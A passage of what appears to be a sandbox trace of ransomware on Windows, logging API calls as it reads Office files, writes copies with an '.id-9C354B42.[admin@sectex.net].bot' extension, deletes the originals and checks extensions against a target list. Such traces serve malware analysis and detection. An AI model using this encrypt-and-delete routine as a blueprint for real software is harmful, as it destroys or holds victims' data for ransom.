	[0161.229] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\NOTEL.ICO.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\notel.ico.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0
	[0161.230] GetLastError () returned 0x0
	[0161.230] ReadFile (in: hFile=0x3b8, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0x436, lpOverlapped=0x0) returned 1
	[0161.232] WriteFile (in: hFile=0x3f0, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0x440, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0x440, lpOverlapped=0x0) returned 1
	[0161.232] ReadFile (in: hFile=0x3b8, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0x0, lpOverlapped=0x0) returned 1
	[0161.232] WriteFile (in: hFile=0x3f0, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0xe6, lpOverlapped=0x0) returned 1
	[0161.233] SetEndOfFile (hFile=0x3f0) returned 1
	[0161.233] CloseHandle (hObject=0x3f0) returned 1
	[0161.233] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0161.233] SetEndOfFile (hFile=0x3b8) returned 1
	[0161.235] CloseHandle (hObject=0x3b8) returned 1
	[0161.235] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\NOTEL.ICO.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0161.235] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\NOTEL.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\notel.ico")) returned 1
	[0161.236] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\NOTEL.ICO") returned 63
	[0161.236] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\NOTEL.ICO") returned 63
	[0161.236] lstrlenW (lpString=".doc") returned 4
	[0161.236] lstrcmpiW (lpString1=".doc", lpString2=".ICO") returned -1
	[0161.236] lstrlenW (lpString=".docx") returned 5
	[0161.236] lstrcmpiW (lpString1=".docx", lpString2="L.ICO") returned -1
	[0161.236] lstrlenW (lpString=".pdf") returned 4
	[0161.236] lstrcmpiW (lpString1=".pdf", lpString2=".ICO") returned 1
	[0161.236] lstrlenW (lpString=".xls") returned 4
	[0161.236] lstrcmpiW (lpString1=".xls", lpString2=".ICO") returned 1
	[0161.236] lstrlenW (lpString=".xlsx") returned 5
	[0161.236] lstrcmpiW (lpString1=".xlsx", lpString2="L.ICO") returned -1
	[0161.236] lstrlenW (lpString=".ppt") returned 4
	[0161.236] lstrcmpiW (lpString1=".ppt", lpString2=".ICO") returned 1
	[0161.236] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\NOTEL.ICO") returned 63
	[0161.236] lstrlenW (lpString=".zip") returned 4
	[0161.236] lstrcmpiW (lpString1=".zip", lpString2=".ICO") returned 1
	[0161.236] lstrlenW (lpString=".rar") returned 4
	[0161.236] lstrcmpiW (lpString1=".rar", lpString2=".ICO") returned 1
	[0161.236] lstrlenW (lpString=".bz2") returned 4
	[0161.236] lstrcmpiW (lpString1=".bz2", lpString2=".ICO") returned -1
	[0161.236] lstrlenW (lpString=".7z") returned 3
	[0161.237] lstrcmpiW (lpString1=".7z", lpString2="ICO") returned -1
	[0161.237] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\NOTEL.ICO") returned 63
	[0161.237] lstrlenW (lpString=".dbf") returned 4
	[0161.237] lstrcmpiW (lpString1=".dbf", lpString2=".ICO") returned -1
	[0161.237] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\NOTEL.ICO") returned 63
	[0161.237] lstrlenW (lpString=".1cd") returned 4
	[0161.237] lstrcmpiW (lpString1=".1cd", lpString2=".ICO") returned -1
	[0161.237] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\NOTEL.ICO") returned 63
	[0161.237] lstrlenW (lpString=".jpg") returned 4
	[0161.237] lstrcmpiW (lpString1=".jpg", lpString2=".ICO") returned 1
	[0161.237] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\NOTEL.ICO") returned 63
	[0161.237] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\NOTEL.ICO") returned 63
	[0161.237] lstrlenW (lpString=".doc") returned 4
	[0161.237] lstrcmpiW (lpString1=".doc", lpString2=".ICO") returned -1
	[0161.237] lstrlenW (lpString=".docx") returned 5
	[0161.237] lstrcmpiW (lpString1=".docx", lpString2="L.ICO") returned -1
	[0161.237] lstrlenW (lpString=".pdf") returned 4
	[0161.237] lstrcmpiW (lpString1=".pdf", lpString2=".ICO") returned 1
	[0161.237] lstrlenW (lpString=".xls") returned 4
	[0161.237] lstrcmpiW (lpString1=".xls", lpString2=".ICO") returned 1
	[0161.237] lstrlenW (lpString=".xlsx") returned 5
	[0161.237] lstrcmpiW (lpString1=".xlsx", lpString2="L.ICO") returned -1
	[0161.237] lstrlenW (lpString=".ppt") returned 4
	[0161.237] lstrcmpiW (lpString1=".ppt", lpString2=".ICO") returned 1
	[0161.237] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\NOTEL.ICO") returned 63
	[0161.237] lstrlenW (lpString=".zip") returned 4
	[0161.237] lstrcmpiW (lpString1=".zip", lpString2=".ICO") returned 1
	[0161.237] lstrlenW (lpString=".rar") returned 4
	[0161.237] lstrcmpiW (lpString1=".rar", lpString2=".ICO") returned 1
	[0161.237] lstrlenW (lpString=".bz2") returned 4
	[0161.237] lstrcmpiW (lpString1=".bz2", lpString2=".ICO") returned -1
	[0161.238] lstrlenW (lpString=".7z") returned 3
	[0161.238] lstrcmpiW (lpString1=".7z", lpString2="ICO") returned -1
	[0161.238] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\NOTEL.ICO") returned 63
	[0161.238] lstrlenW (lpString=".dbf") returned 4
	[0161.238] lstrcmpiW (lpString1=".dbf", lpString2=".ICO") returned -1
	[0161.238] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\NOTEL.ICO") returned 63
	[0161.238] lstrlenW (lpString=".1cd") returned 4
	[0161.238] lstrcmpiW (lpString1=".1cd", lpString2=".ICO") returned -1
	[0161.238] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\NOTEL.ICO") returned 63
	[0161.238] lstrlenW (lpString=".jpg") returned 4
	[0161.238] lstrcmpiW (lpString1=".jpg", lpString2=".ICO") returned 1
	[0161.238] lstrcmpiW (lpString1=".ICO", lpString2=".bot") returned 1
	[0161.238] lstrlenW (lpString="NOTES.ICO") returned 9
	[0161.238] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\NOTES.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\notes.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b8
	[0161.239] GetFileSizeEx (in: hFile=0x3b8, lpFileSize=0xad0ff1c | out: lpFileSize=0xad0ff1c*=2998) returned 1
	[0161.239] CloseHandle (hObject=0x3b8) returned 1
	[0161.239] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\NOTES.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\notes.ico")) returned 0x20
	[0161.239] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\NOTES.ICO.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\notes.ico.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0161.239] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\NOTES.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\notes.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b8
	[0161.239] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0161.239] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0161.239] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\NOTES.ICO.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\notes.ico.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0
	[0161.240] GetLastError () returned 0x0
	[0161.240] ReadFile (in: hFile=0x3b8, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0xbb6, lpOverlapped=0x0) returned 1
	[0161.242] WriteFile (in: hFile=0x3f0, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0xbc0, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0xbc0, lpOverlapped=0x0) returned 1
	[0161.242] ReadFile (in: hFile=0x3b8, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0x0, lpOverlapped=0x0) returned 1
	[0161.242] WriteFile (in: hFile=0x3f0, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0xe6, lpOverlapped=0x0) returned 1
	[0161.243] SetEndOfFile (hFile=0x3f0) returned 1
	[0161.243] CloseHandle (hObject=0x3f0) returned 1
	[0161.243] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0161.243] SetEndOfFile (hFile=0x3b8) returned 1
	[0161.245] CloseHandle (hObject=0x3b8) returned 1
	[0161.245] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\NOTES.ICO.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0161.245] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\NOTES.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\notes.ico")) returned 1
	[0161.246] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\NOTES.ICO") returned 63
	[0161.246] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\NOTES.ICO") returned 63
	[0161.246] lstrlenW (lpString=".doc") returned 4
	[0161.246] lstrcmpiW (lpString1=".doc", lpString2=".ICO") returned -1
	[0161.246] lstrlenW (lpString=".docx") returned 5
	[0161.246] lstrcmpiW (lpString1=".docx", lpString2="S.ICO") returned -1
	[0161.246] lstrlenW (lpString=".pdf") returned 4
	[0161.246] lstrcmpiW (lpString1=".pdf", lpString2=".ICO") returned 1
	[0161.246] lstrlenW (lpString=".xls") returned 4
	[0161.246] lstrcmpiW (lpString1=".xls", lpString2=".ICO") returned 1
	[0161.246] lstrlenW (lpString=".xlsx") returned 5
	[0161.246] lstrcmpiW (lpString1=".xlsx", lpString2="S.ICO") returned -1
	[0161.246] lstrlenW (lpString=".ppt") returned 4
	[0161.246] lstrcmpiW (lpString1=".ppt", lpString2=".ICO") returned 1
	[0161.246] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\NOTES.ICO") returned 63
	[0161.246] lstrlenW (lpString=".zip") returned 4
	[0161.246] lstrcmpiW (lpString1=".zip", lpString2=".ICO") returned 1
	[0161.246] lstrlenW (lpString=".rar") returned 4
	[0161.246] lstrcmpiW (lpString1=".rar", lpString2=".ICO") returned 1
	[0161.246] lstrlenW (lpString=".bz2") returned 4
	[0161.246] lstrcmpiW (lpString1=".bz2", lpString2=".ICO") returned -1
	[0161.246] lstrlenW (lpString=".7z") returned 3
	[0161.246] lstrcmpiW (lpString1=".7z", lpString2="ICO") returned -1
	[0161.246] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\NOTES.ICO") returned 63
	[0161.246] lstrlenW (lpString=".dbf") returned 4
	[0161.247] lstrcmpiW (lpString1=".dbf", lpString2=".ICO") returned -1
	[0161.247] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\NOTES.ICO") returned 63
	[0161.247] lstrlenW (lpString=".1cd") returned 4
	[0161.247] lstrcmpiW (lpString1=".1cd", lpString2=".ICO") returned -1
	[0161.247] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\NOTES.ICO") returned 63
	[0161.247] lstrlenW (lpString=".jpg") returned 4
	[0161.247] lstrcmpiW (lpString1=".jpg", lpString2=".ICO") returned 1
	[0161.247] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\NOTES.ICO") returned 63
	[0161.247] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\NOTES.ICO") returned 63
	[0161.247] lstrlenW (lpString=".doc") returned 4
	[0161.247] lstrcmpiW (lpString1=".doc", lpString2=".ICO") returned -1
	[0161.247] lstrlenW (lpString=".docx") returned 5
	[0161.247] lstrcmpiW (lpString1=".docx", lpString2="S.ICO") returned -1
	[0161.247] lstrlenW (lpString=".pdf") returned 4
	[0161.247] lstrcmpiW (lpString1=".pdf", lpString2=".ICO") returned 1
	[0161.247] lstrlenW (lpString=".xls") returned 4
	[0161.247] lstrcmpiW (lpString1=".xls", lpString2=".ICO") returned 1
	[0161.247] lstrlenW (lpString=".xlsx") returned 5
	[0161.247] lstrcmpiW (lpString1=".xlsx", lpString2="S.ICO") returned -1
	[0161.247] lstrlenW (lpString=".ppt") returned 4
	[0161.247] lstrcmpiW (lpString1=".ppt", lpString2=".ICO") returned 1
	[0161.247] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\NOTES.ICO") returned 63
	[0161.247] lstrlenW (lpString=".zip") returned 4
	[0161.247] lstrcmpiW (lpString1=".zip", lpString2=".ICO") returned 1
	[0161.247] lstrlenW (lpString=".rar") returned 4
	[0161.247] lstrcmpiW (lpString1=".rar", lpString2=".ICO") returned 1
	[0161.247] lstrlenW (lpString=".bz2") returned 4
	[0161.247] lstrcmpiW (lpString1=".bz2", lpString2=".ICO") returned -1
	[0161.247] lstrlenW (lpString=".7z") returned 3
	[0161.247] lstrcmpiW (lpString1=".7z", lpString2="ICO") returned -1
	[0161.247] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\NOTES.ICO") returned 63
	[0161.248] lstrlenW (lpString=".dbf") returned 4
	[0161.248] lstrcmpiW (lpString1=".dbf", lpString2=".ICO") returned -1
	[0161.248] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\NOTES.ICO") returned 63
	[0161.248] lstrlenW (lpString=".1cd") returned 4
	[0161.248] lstrcmpiW (lpString1=".1cd", lpString2=".ICO") returned -1
	[0161.248] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\NOTES.ICO") returned 63
	[0161.248] lstrlenW (lpString=".jpg") returned 4
	[0161.248] lstrcmpiW (lpString1=".jpg", lpString2=".ICO") returned 1
	[0161.248] lstrcmpiW (lpString1=".CFG", lpString2=".bot") returned 1
	[0161.248] lstrlenW (lpString="OMSMMS.CFG") returned 10
	[0161.248] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\OMSMMS.CFG" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\omsmms.cfg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b8
	[0161.248] GetFileSizeEx (in: hFile=0x3b8, lpFileSize=0xad0ff1c | out: lpFileSize=0xad0ff1c*=615) returned 1
	[0161.249] CloseHandle (hObject=0x3b8) returned 1
	[0161.664] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\OMSMMS.CFG" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\omsmms.cfg")) returned 0x20
	[0161.669] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\OMSMMS.CFG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\omsmms.cfg.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0161.678] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\OMSMMS.CFG" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\omsmms.cfg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c
	[0161.679] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0161.679] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0161.679] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\OMSMMS.CFG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\omsmms.cfg.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4
	[0161.680] GetLastError () returned 0x0
	[0161.680] ReadFile (in: hFile=0x37c, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0x267, lpOverlapped=0x0) returned 1
	[0161.680] WriteFile (in: hFile=0x1b4, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0x270, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0x270, lpOverlapped=0x0) returned 1
	[0161.681] ReadFile (in: hFile=0x37c, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0x0, lpOverlapped=0x0) returned 1
	[0161.681] WriteFile (in: hFile=0x1b4, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0xe8, lpOverlapped=0x0) returned 1
	[0161.682] SetEndOfFile (hFile=0x1b4) returned 1
	[0161.682] CloseHandle (hObject=0x1b4) returned 1
	[0161.682] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0161.682] SetEndOfFile (hFile=0x37c) returned 1
	[0161.684] CloseHandle (hObject=0x37c) returned 1
	[0161.684] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\OMSMMS.CFG.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0161.684] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\OMSMMS.CFG" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\omsmms.cfg")) returned 1
	[0161.685] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\OMSMMS.CFG") returned 64
	[0161.685] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\OMSMMS.CFG") returned 64
	[0161.685] lstrlenW (lpString=".doc") returned 4
	[0161.685] lstrcmpiW (lpString1=".doc", lpString2=".CFG") returned 1
	[0161.685] lstrlenW (lpString=".docx") returned 5
	[0161.685] lstrcmpiW (lpString1=".docx", lpString2="S.CFG") returned -1
	[0161.685] lstrlenW (lpString=".pdf") returned 4
	[0161.685] lstrcmpiW (lpString1=".pdf", lpString2=".CFG") returned 1
	[0161.686] lstrlenW (lpString=".xls") returned 4
	[0161.686] lstrcmpiW (lpString1=".xls", lpString2=".CFG") returned 1
	[0161.686] lstrlenW (lpString=".xlsx") returned 5
	[0161.686] lstrcmpiW (lpString1=".xlsx", lpString2="S.CFG") returned -1
	[0161.686] lstrlenW (lpString=".ppt") returned 4
	[0161.686] lstrcmpiW (lpString1=".ppt", lpString2=".CFG") returned 1
	[0161.686] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\OMSMMS.CFG") returned 64
	[0161.686] lstrlenW (lpString=".zip") returned 4
	[0161.686] lstrcmpiW (lpString1=".zip", lpString2=".CFG") returned 1
	[0161.686] lstrlenW (lpString=".rar") returned 4
	[0161.686] lstrcmpiW (lpString1=".rar", lpString2=".CFG") returned 1
	[0161.686] lstrlenW (lpString=".bz2") returned 4
	[0161.686] lstrcmpiW (lpString1=".bz2", lpString2=".CFG") returned -1
	[0161.686] lstrlenW (lpString=".7z") returned 3
	[0161.686] lstrcmpiW (lpString1=".7z", lpString2="CFG") returned -1
	[0161.686] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\OMSMMS.CFG") returned 64
	[0161.686] lstrlenW (lpString=".dbf") returned 4
	[0161.686] lstrcmpiW (lpString1=".dbf", lpString2=".CFG") returned 1
	[0161.686] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\OMSMMS.CFG") returned 64
	[0161.686] lstrlenW (lpString=".1cd") returned 4
	[0161.686] lstrcmpiW (lpString1=".1cd", lpString2=".CFG") returned -1
	[0161.686] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\OMSMMS.CFG") returned 64
	[0161.686] lstrlenW (lpString=".jpg") returned 4
	[0161.686] lstrcmpiW (lpString1=".jpg", lpString2=".CFG") returned 1
	[0161.687] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\OMSMMS.CFG") returned 64
	[0161.687] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\OMSMMS.CFG") returned 64
	[0161.687] lstrlenW (lpString=".doc") returned 4
	[0161.687] lstrcmpiW (lpString1=".doc", lpString2=".CFG") returned 1
	[0161.687] lstrlenW (lpString=".docx") returned 5
	[0161.687] lstrcmpiW (lpString1=".docx", lpString2="S.CFG") returned -1
	[0161.687] lstrlenW (lpString=".pdf") returned 4
	[0161.687] lstrcmpiW (lpString1=".pdf", lpString2=".CFG") returned 1
	[0161.687] lstrlenW (lpString=".xls") returned 4
	[0161.687] lstrcmpiW (lpString1=".xls", lpString2=".CFG") returned 1
	[0161.687] lstrlenW (lpString=".xlsx") returned 5
	[0161.687] lstrcmpiW (lpString1=".xlsx", lpString2="S.CFG") returned -1
	[0161.687] lstrlenW (lpString=".ppt") returned 4
	[0161.687] lstrcmpiW (lpString1=".ppt", lpString2=".CFG") returned 1
	[0161.687] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\OMSMMS.CFG") returned 64
	[0161.687] lstrlenW (lpString=".zip") returned 4
	[0161.687] lstrcmpiW (lpString1=".zip", lpString2=".CFG") returned 1
	[0161.687] lstrlenW (lpString=".rar") returned 4
	[0161.687] lstrcmpiW (lpString1=".rar", lpString2=".CFG") returned 1
	[0161.687] lstrlenW (lpString=".bz2") returned 4
	[0161.687] lstrcmpiW (lpString1=".bz2", lpString2=".CFG") returned -1
	[0161.687] lstrlenW (lpString=".7z") returned 3
	[0161.687] lstrcmpiW (lpString1=".7z", lpString2="CFG") returned -1
	[0161.687] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\OMSMMS.CFG") returned 64
	[0161.687] lstrlenW (lpString=".dbf") returned 4
	[0161.687] lstrcmpiW (lpString1=".dbf", lpString2=".CFG") returned 1
	[0161.687] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\OMSMMS.CFG") returned 64
	[0161.687] lstrlenW (lpString=".1cd") returned 4
	[0161.687] lstrcmpiW (lpString1=".1cd", lpString2=".CFG") returned -1
	[0161.687] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\OMSMMS.CFG") returned 64
	[0161.687] lstrlenW (lpString=".jpg") returned 4
	[0161.687] lstrcmpiW (lpString1=".jpg", lpString2=".CFG") returned 1
	[0161.688] lstrcmpiW (lpString1=".ICO", lpString2=".bot") returned 1
	[0161.688] lstrlenW (lpString="POSTL.ICO") returned 9
	[0161.688] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\POSTL.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\postl.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c
	[0161.688] GetFileSizeEx (in: hFile=0x37c, lpFileSize=0xad0ff1c | out: lpFileSize=0xad0ff1c*=1078) returned 1
	[0161.688] CloseHandle (hObject=0x37c) returned 1
	[0161.688] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\POSTL.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\postl.ico")) returned 0x20
	[0161.688] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\POSTL.ICO.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\postl.ico.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0161.689] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\POSTL.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\postl.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c
	[0161.689] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0161.689] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
